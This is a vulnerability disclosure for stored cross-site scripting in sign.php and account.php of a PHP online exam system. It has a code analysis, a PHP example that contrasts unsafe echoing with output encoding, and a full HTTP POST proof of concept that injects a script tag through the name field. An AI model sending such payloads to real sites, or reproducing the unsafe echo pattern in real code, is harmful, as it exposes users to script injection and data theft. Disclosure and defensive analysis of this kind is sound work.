
code-projects online-exam-mastering-system-php has a Cross Site Scripting vulnerability in sign.php and account.php

supplier

https://code-projects.org/online-exam-mastering-system-php/

description

sign.php and account.php in online-exam-mastering-system-php are open to unrestricted cross site scripting and injection attacks. The controllable parameter is the name parameter. The user-supplied value is passed into an echo statement without restriction. Malicious attackers can exploit this vulnerability to obtain sensitive information from clients.

Code analysis

[image: code screenshots]

The data is stored in the database, queried back and echoed out directly without any filtering, resulting in the execution of XSS statements.
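The echo-without-filter pattern described above, shown beside an output-encoded form. This is an added example, not the project's code: the function names and the sample value are constructed, and the project's own variable names are not assumed.

```php
<?php
declare(strict_types=1);
// Added example, not the project's code. Function names are hypothetical.

// Constructed sample: a name value as it would come back from the database
// after being stored unfiltered.
$storedName = '<script>alert(1)</script>';

// Vulnerable pattern: the stored value is concatenated into HTML as-is,
// so the browser parses it as markup.
function render_unsafe(string $name): string
{
    return '<span>Hello, ' . $name . '</span>';
}

// Encode for the HTML context at output time. ENT_QUOTES also covers
// quoted attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 sequences
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $name): string
{
    return '<span>Hello, ' . h($name) . '</span>'
        . '<input type="text" name="name" value="' . h($name) . '">';
}

// Defence in depth at sign-up: accept only letters, combining marks, spaces
// and a few punctuation characters, up to 64 characters in total.
// Output encoding is still required for every echo of the value.
function is_valid_name(string $name): bool
{
    return preg_match('/\A[\p{L}\p{M}][\p{L}\p{M} .\'-]{0,63}\z/u', $name) === 1;
}

echo render_unsafe($storedName), PHP_EOL;
echo render_safe($storedName), PHP_EOL;
var_dump(is_valid_name($storedName));
var_dump(is_valid_name("Anne-Marie O'Neil"));
```

Encoding belongs at every place the stored value is written into a page, since a value already in the database stays dangerous even after input validation is added.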

payload

POST /sign.php?q=account.php HTTP/1.1
Host: 192.168.0.143
Content-Length: 129
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.143
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.143/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&gender=M&college=aaa&email=aaa%40aaa.com&mob=123456&password=123456&cpassword=123456

result

[image: result screenshot]